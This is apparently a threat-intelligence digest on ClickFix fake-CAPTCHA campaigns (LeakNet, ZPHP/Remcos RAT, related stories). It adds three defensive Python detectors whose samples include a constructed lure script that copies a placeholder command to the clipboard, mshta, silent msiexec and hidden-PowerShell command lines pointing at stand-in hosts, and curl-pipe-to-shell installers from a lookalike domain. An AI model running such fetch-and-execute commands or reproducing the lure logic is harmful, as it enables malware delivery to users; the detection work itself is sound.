Mallory

ClickFix Social Engineering Drives Multiple Malware and Ransomware Intrusions

initial-access-method, phishing-campaign-intelligence, loader-delivery-mechanism, remote-access-implant, ransomware-group-operation
Updated March 21, 2026 at 05:47 AM (3 sources)


Attackers are increasingly using ClickFix fake CAPTCHA and verification lures on compromised websites to trick users into manually executing malicious commands, turning social engineering into a scalable initial-access method. LeakNet adopted the technique to reduce reliance on stolen credentials and initial access brokers, using hacked sites to deliver a staged Deno-based in-memory loader before following a repeatable post-exploitation sequence that can end in ransomware deployment. Separately, the ZPHP campaign used similar fake Cloudflare Turnstile-style prompts against U.S. SLTT organizations to deliver Remcos RAT, with hidden JavaScript on compromised sites selectively replacing page content with attacker-controlled instructions for Windows users.

The reporting indicates a broader shift in which ClickFix is no longer tied to a single actor or payload, but is being reused across financially motivated and malware-delivery operations because it is cheap, effective, and difficult for users to recognize as malicious. One additional roundup reference points to Termite ransomware and CastleRAT activity linked to ClickFix, reinforcing that the technique is spreading across campaigns, but it does not provide enough detail to treat that activity as the same incident as LeakNet or ZPHP. The material is substantive: it contains concrete threat intelligence on active intrusion methods, victim targeting, malware delivery chains, and operational tradecraft relevant to enterprise defense.
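The web-side half of the technique is the part a site owner or web-proxy team can look for: injected script that checks for a Windows user agent, rewrites the page with a fake verification prompt, and copies text to the clipboard. The following Python scanner is an added example, not code from the page, CIS, or ReliaQuest. It scores a page against those indicators and applies a simple decision rule; the indicator patterns, the rule, and both HTML samples are this example's own assumptions (the copied command in the lure sample is a placeholder string).

```python
"""Heuristic scan for ClickFix lure code injected into a web page.

Added example; not code from the page, CIS or ReliaQuest. It looks for the
combination described in the reporting: script that gates on a Windows user
agent, copies text to the clipboard, hides or rewrites the page content, and
shows "verification" text telling the user to run something. The two HTML
samples below are constructed for illustration; the decision rule and the
indicator patterns are this example's own assumptions.
"""
import re
from dataclasses import dataclass, field

# Indicator name -> pattern. These are heuristics, not vendor signatures.
INDICATORS = {
    "windows_ua_gate": re.compile(
        r"/Windows/i?\.test\(\s*navigator\.userAgent"
        r"|navigator\.userAgent\.(?:includes|indexOf|match)\(\s*['\"/]Windows", re.I),
    "clipboard_write": re.compile(
        r"navigator\.clipboard\.writeText|execCommand\(\s*['\"]copy['\"]\s*\)", re.I),
    "dom_replace": re.compile(r"document\.body\.innerHTML\s*=|document\.write\(", re.I),
    "verify_lure": re.compile(
        r"verify you are human|i am not a robot|turnstile|captcha", re.I),
    "run_instruction": re.compile(
        r"win\s*\+\s*r\b|ctrl\s*\+\s*v\b|powershell|mshta|msiexec", re.I),
    "hidden_style": re.compile(
        r"display\s*:\s*none|visibility\s*:\s*hidden|opacity\s*:\s*0\b", re.I),
}


@dataclass
class ScanResult:
    hits: list = field(default_factory=list)
    suspicious: bool = False


def scan_page(html: str) -> ScanResult:
    """Return the matched indicator names and a verdict for one page body."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(html)]
    # Assumed rule: a verification lure together with a clipboard write, plus
    # either explicit run instructions or a Windows-only gate, is the signature.
    suspicious = ("clipboard_write" in hits and "verify_lure" in hits
                  and bool({"run_instruction", "windows_ua_gate"} & set(hits)))
    return ScanResult(hits=hits, suspicious=suspicious)


# Constructed sample: a page with a real CAPTCHA widget and nothing else of note.
BENIGN_HTML = """
<form><div class="cf-turnstile" data-sitekey="SITEKEY_PLACEHOLDER"></div>
<button>Submit</button></form>
"""

# Constructed sample of the injected lure pattern. The copied command is a
# placeholder; the point is the page logic around it.
LURE_HTML = """
<div id="content">...original page...</div>
<div id="verify" style="display:none">
  <h2>Verify you are human</h2>
  <p>Step 1: press Win+R. Step 2: press Ctrl+V. Step 3: press Enter.</p>
</div>
<script>
  var cmd = "COMMAND_PLACEHOLDER";
  if (/Windows/i.test(navigator.userAgent)) {
    document.body.innerHTML = document.getElementById("verify").innerHTML;
    navigator.clipboard.writeText(cmd);
  }
</script>
"""

if __name__ == "__main__":
    for label, html in (("benign", BENIGN_HTML), ("lure", LURE_HTML)):
        r = scan_page(html)
        print(f"{label}: suspicious={r.suspicious} hits={r.hits}")
```

The benign sample trips only the `verify_lure` indicator (a real Turnstile widget mentions the same words), which is why the verdict requires the clipboard write as well; a scanner keyed on CAPTCHA vocabulary alone would flag every legitimate verification page.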

Timeline

  1. Mar 17, 2026

    CIS publishes analysis of ZPHP ClickFix campaign and SLTT impact

    CIS released technical details on the ZPHP campaign, describing a kill chain involving malicious JavaScript, mshta.exe, an HTA file, PowerShell, a large ZIP archive, and DLL sideloading with in-memory decryption to deploy Remcos RAT. The organization said it had linked the activity to multiple SLTT incidents and observed substantial detection and blocking volume across its monitoring services.

  2. Mar 17, 2026

    ReliaQuest links separate Teams phishing attempt to same LeakNet loader chain

    ReliaQuest said a distinct Microsoft Teams phishing intrusion attempt resulted in the same Deno-based loader and similar post-compromise activity seen in the ClickFix intrusions. This indicated LeakNet was using multiple initial access methods that converged on the same tooling and attack sequence.

  3. Mar 17, 2026

    LeakNet adopts ClickFix via compromised websites for initial access

    ReliaQuest reported that LeakNet shifted from relying on stolen credentials from initial access brokers to using ClickFix social engineering delivered through hacked websites. Victims were prompted by fake CAPTCHA pages to run a malicious msiexec.exe command, leading to a Deno-based in-memory loader and a repeatable post-exploitation chain ending in data theft and encryption.

  4. Jan 1, 2026

    ZPHP campaign targets U.S. SLTT organizations with Remcos RAT

    In 2026, CIS observed an ongoing ZPHP malware campaign affecting U.S. State, Local, Tribal, and Territorial government organizations. The activity used compromised websites, fake Cloudflare Turnstile CAPTCHA pages, and ClickFix lures to trick users into executing malicious commands that ultimately deployed Remcos RAT.

  5. Nov 1, 2024

    LeakNet ransomware operation emerges

    LeakNet emerged in November 2024 and described itself as a "digital watchdog." Reporting cited by ReliaQuest also noted the group has targeted industrial entities, according to Dragos.
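The timeline names two execution chains that endpoint telemetry can distinguish: the ZPHP path (mshta.exe pulling an HTA, then PowerShell, then a ZIP and DLL sideloading) and the LeakNet path (a user-run msiexec.exe command leading to a Deno-based loader). The following Python triage is an added example, not tooling from CIS or ReliaQuest. It applies parent/child and command-line rules to Sysmon-style process-creation events (fields `Image`, `ParentImage`, `CommandLine`); the event lines are constructed, hostnames use the reserved `.invalid` TLD, and the rules and their names are this example's own assumptions.

```python
"""Process-creation triage for ClickFix execution chains.

Added example, not tooling from CIS or ReliaQuest. It applies a few parent/
child and command-line rules to Sysmon-style process-creation events (Image,
ParentImage, CommandLine): a script host launched from the desktop shell
(explorer.exe parent, which is where a Win+R launch comes from) with a URL on
its command line, mshta.exe pulling an HTA, msiexec.exe quietly installing
from a URL, PowerShell spawned by mshta.exe, and a Deno runtime started by a
script host. The event lines are constructed; the rules are assumptions.
"""
import json
import re

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "msiexec.exe",
                "cmd.exe", "wscript.exe", "cscript.exe"}
URL_RX = re.compile(r"https?://\S+", re.I)
QUIET_RX = re.compile(r"(?:^|\s)/q[nb]?\b", re.I)  # msiexec /q, /qn, /qb


def image_name(path: str) -> str:
    """Return the lower-cased file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(event: dict) -> list:
    """Return the names of every rule the event matches (empty if none)."""
    img = image_name(event.get("Image", ""))
    parent = image_name(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    hits = []
    if parent == "explorer.exe" and img in SCRIPT_HOSTS and URL_RX.search(cmd):
        hits.append("user_launched_script_host_with_url")  # Run-dialog style launch
    if img == "mshta.exe" and (URL_RX.search(cmd) or ".hta" in cmd.lower()):
        hits.append("mshta_remote_hta")
    if img == "msiexec.exe" and URL_RX.search(cmd) and QUIET_RX.search(cmd):
        hits.append("msiexec_silent_remote_install")
    if img in {"powershell.exe", "pwsh.exe"} and parent == "mshta.exe":
        hits.append("powershell_spawned_by_mshta")
    if img == "deno.exe" and parent in SCRIPT_HOSTS:
        hits.append("deno_runtime_from_script_host")
    return hits


def triage(jsonl: str) -> dict:
    """Map 1-based line number -> matched rules for every event that fires."""
    findings = {}
    for n, line in enumerate(jsonl.strip().splitlines(), 1):
        hits = evaluate(json.loads(line))
        if hits:
            findings[n] = hits
    return findings


# Constructed events (JSON Lines). Hosts use the reserved .invalid TLD and the
# second-stage command is a placeholder.
SAMPLE_EVENTS = r"""
{"ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\mshta.exe", "CommandLine": "mshta https://lure.example.invalid/verify.hta"}
{"ParentImage": "C:\\Windows\\System32\\mshta.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -w hidden -c STAGE2_PLACEHOLDER"}
{"ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\msiexec.exe", "CommandLine": "msiexec /i https://lure.example.invalid/update.msi /qn"}
{"ParentImage": "C:\\Windows\\System32\\services.exe", "Image": "C:\\Windows\\System32\\msiexec.exe", "CommandLine": "C:\\Windows\\System32\\msiexec.exe /V"}
{"ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\notepad.exe", "CommandLine": "notepad.exe notes.txt"}
{"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "Image": "C:\\Users\\user\\AppData\\Local\\deno\\deno.exe", "CommandLine": "deno run loader.js"}
"""

if __name__ == "__main__":
    for n, rules in triage(SAMPLE_EVENTS).items():
        print(f"event {n}: {', '.join(rules)}")
```

Events 4 and 5 (the Windows Installer service instance and a user opening Notepad) produce no findings, which is the property worth checking before deploying rules like these: msiexec.exe and explorer.exe children are extremely common, so each rule keys on the URL or the parent rather than on the binary alone.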


Related Stories

ClickFix Social Engineering Campaigns Expand Malware and Ransomware Delivery

Researchers reported continued expansion of **ClickFix** as an initial-access technique, with attackers using fake CAPTCHA or verification pages to trick users into executing clipboard-delivered commands on Windows systems. In one campaign, **LeakNet** shifted away from relying on initial access brokers and instead used compromised legitimate websites hosting fake Cloudflare Turnstile checks to broaden victim acquisition and reduce network-based detection. ReliaQuest linked the activity to LeakNet through overlapping infrastructure and consistent TTPs, and noted the group paired ClickFix with a stealthy, memory-resident loader built on the **Deno** JavaScript runtime to support ransomware operations. A separate ClickFix campaign analyzed by Atos used the same user-executed command pattern to map attacker-controlled network drives with `net use`, then download a trojanized but legitimately signed *WorkFlowy* application whose modified `asar` archive executed malicious code in the **Node.js** main process with the logged-in user’s privileges. Other reporting on **Hive0163** also identified ClickFix as one of several initial-access methods used in **Interlock** ransomware intrusions, although that article focused primarily on the group’s likely AI-generated **Slopoly** malware rather than a specific ClickFix incident. Reporting on **Operation Covert Access** in Argentina’s judicial sector was unrelated, describing spear-phishing with fake court documents to deliver **COVERT RAT** via a different intrusion chain.

1 month ago
ClickFix Social-Engineering Technique Used to Trick Users Into Running Malware

Multiple reports highlighted **ClickFix**, a social-engineering technique that uses fake verification or update prompts to coerce users into manually executing attacker-supplied commands, as a recurring initial access method in recent malware activity. In the **OCRFix** botnet campaign, victims were lured to a typosquatted site impersonating *Tesseract OCR* (`tesseract-ocr[.]com` lookalike) via SEO poisoning and reported **LLM poisoning** (chatbot recommendations pointing users to the malicious site). The site presented a fake CAPTCHA that copied an obfuscated PowerShell command to the clipboard and instructed the user to paste it into PowerShell; this led to retrieval of a malicious MSI (`98166e51.msi`) from `opsecdefcloud[.]com`, after which victims were redirected to the legitimate GitHub project to reduce suspicion. The loader then queried a **BNB TestNet** smart contract to obtain C2 details, using **EtherHiding** (blockchain-hosted instructions) to make takedown and disruption more difficult. A separate investigation described a **Chrome extension supply-chain compromise** of *QuickLens – Search Screen with Google Lens* (7,000+ users), where attackers acquired the extension and shipped an update embedding malicious scripts and elevated permissions to enable credential/crypto theft and staged payload delivery; the campaign also incorporated a **ClickFix** flow that masqueraded as a legitimate browser update to trick users into executing malicious code. Other items in the set covered different topics: an AiTM phishing-kit attribution case study (focused on reverse-proxy phishing infrastructure rather than ClickFix), research on **Funnull/Fangneng CDN** as cybercrime-enabling infrastructure and related supply-chain activity, and Zscaler reporting on **Dust Specter APT** targeting Iraqi government officials with password-protected RAR delivery and custom malware modules—none of which were primarily about ClickFix.

1 month ago
ClickFix Social Engineering Drives Multi-Platform Malware Delivery

Security researchers reported multiple active campaigns using **ClickFix** social engineering—fake error dialogs or verification prompts that trick users into manually running attacker-supplied commands—to bypass browser and download protections and establish an initial foothold. In one enterprise case investigated by **CERT Polska (cert.pl)**, victims were lured via compromised websites showing a fake CAPTCHA/“fix” prompt that instructed them to paste and run a **PowerShell** command via `Win+R`; the script then downloaded a dropper and enabled rapid follow-on activity that can scale to **enterprise-wide compromise**, including deployment of secondary malware such as **Latrodectus** and **Supper** for data theft, lateral movement, and potential ransomware staging. A separate ClickFix operation targeted **macOS developers** by cloning the *Homebrew* site on typosquatted infrastructure; the “install” command was subtly altered to fetch content from `raw.homabrews.org` instead of `raw.githubusercontent.com`, leading to **Cuckoo Stealer** deployment and credential harvesting via repeated password prompts using macOS Directory Services, with related domains tied to shared hosting at **`5.255.123.244`**. ClickFix was also observed as the initial execution mechanism for the resurfaced **Matanbuchus 3.0** MaaS loader, which uses deceptive copy/paste prompts and **silent MSI** execution (via `msiexec`) to deliver a new payload, **AstarionRAT**, enabling capabilities including credential theft and **SOCKS5** proxying; operators were reported to move laterally quickly (including toward domain controllers), consistent with ransomware or data-exfiltration objectives.

1 month ago
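Two of the related stories describe the same trick in a non-CAPTCHA form: a pasted install command whose download URL points at a lookalike of the real host (the Homebrew clone fetching from `raw.homabrews.org` instead of `raw.githubusercontent.com`, and the typosquatted Tesseract OCR site). The following Python checker is an added example, not code from CERT Polska or any vendor named above. It extracts every URL from a command a user is about to paste, accepts hosts on an allowlist, and flags other hosts as lookalikes when any DNS label is within a small edit distance of a known brand; the allowlist, the brand list, the distance threshold, and the third sample command are this example's own assumptions.

```python
"""Check a pasted install command for lookalike download hosts.

Added example, not code from the page or the vendors it cites. Given a shell
one-liner, it pulls out every URL, accepts hosts on an allowlist, and flags
the rest as "lookalike" (a DNS label close to a known brand) or "unknown".
The allowlist, brand list and threshold are assumptions; the Homebrew URLs
come from the reporting, the .invalid host is constructed.
"""
import re
from urllib.parse import urlsplit

URL_RX = re.compile(r"https?://[^\s'\"()]+", re.I)
TRUSTED_HOSTS = {"raw.githubusercontent.com", "github.com", "brew.sh"}  # assumption
BRANDS = {"homebrew", "github", "githubusercontent"}                    # assumption


def levenshtein(a: str, b: str) -> int:
    """Classic edit distance (insert/delete/substitute), O(len(a)*len(b))."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def check_command(cmd: str, max_dist: int = 2) -> list:
    """Return one verdict dict per URL found in the command."""
    verdicts = []
    for url in URL_RX.findall(cmd):
        host = (urlsplit(url).hostname or "").lower()
        if host in TRUSTED_HOSTS:
            verdicts.append({"host": host, "verdict": "trusted", "near": None})
            continue
        # Compare each DNS label against the brand list; distance 0 catches
        # the brand used as a subdomain of an unrelated host.
        best = None
        for label in host.split("."):
            for brand in BRANDS:
                d = levenshtein(label, brand)
                if d <= max_dist and (best is None or d < best[1]):
                    best = (brand, d)
        verdicts.append({
            "host": host,
            "verdict": "lookalike" if best else "unknown",
            "near": best[0] if best else None,
        })
    return verdicts


# The genuine Homebrew installer one-liner (public), the altered variant the
# reporting describes, and a constructed command with an unrelated host.
LEGIT_CMD = '/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"'
CLONE_CMD = '/bin/bash -c "$(curl -fsSL https://raw.homabrews.org/Homebrew/install/HEAD/install.sh)"'
UNKNOWN_CMD = 'curl -fsSL https://cdn.example.invalid/setup.sh | sh'

if __name__ == "__main__":
    for name, cmd in (("legit", LEGIT_CMD), ("clone", CLONE_CMD), ("unknown", UNKNOWN_CMD)):
        print(name, check_command(cmd))
```

The altered command differs from the real one by a single host label, which is exactly why a visual comparison fails and an edit-distance check against the brand succeeds: `homabrews` is two edits from `homebrew`, while the remaining labels of a legitimate host never come that close to a brand they do not belong to.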
